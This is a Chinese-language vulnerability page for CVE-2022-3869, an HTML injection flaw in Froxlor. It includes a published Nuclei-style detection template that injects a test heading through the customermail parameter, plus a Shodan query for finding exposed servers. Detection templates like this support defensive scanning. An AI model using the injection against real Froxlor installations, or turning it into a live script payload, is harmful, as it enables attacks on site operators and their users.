CVE-2022-3869: Froxlor < 0.10.38.2. - HTML Injection

日期: 2025-08-01 | 影响软件: Froxlor | POC: 已公开

漏洞描述

HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.

PoC代码[已公开]

id: CVE-2022-3869

info:
  name: Froxlor < 0.10.38.2. - HTML Injection
  author: ctflearner
  severity: medium
  description: |
    HTML Injection in GitHub repository froxlor/froxlor prior to 0.10.38.2.
  reference:
    - https://huntr.com/bounties/7de20f21-4a9b-445d-ae2b-15ade648900b
    - https://nvd.nist.gov/vuln/detail/CVE-2022-3869
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-3869
    cwe-id: CWE-79
    epss-score: 0.28991
    epss-percentile: 0.96419
  metadata:
    verified: true
    max-request: 1
    shodan-query: title:"Froxlor"
    product: froxlor
  tags: cve2023,cve,froxlor,html

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?showmessage=4&customermail=\"><h2>TEST</h2>"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'The message to ""><h2>TEST</h2>" failed'

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210089c61b3e775a1497538f1353805674abf3852727dbccb39718fdcefece1c4cd9022047326021e6be736c6a1469b75aff23019de79a3f17594c1fc7d6dfe4a96f96c4:922c64590222798bb761d5b6d8e72950

相关漏洞推荐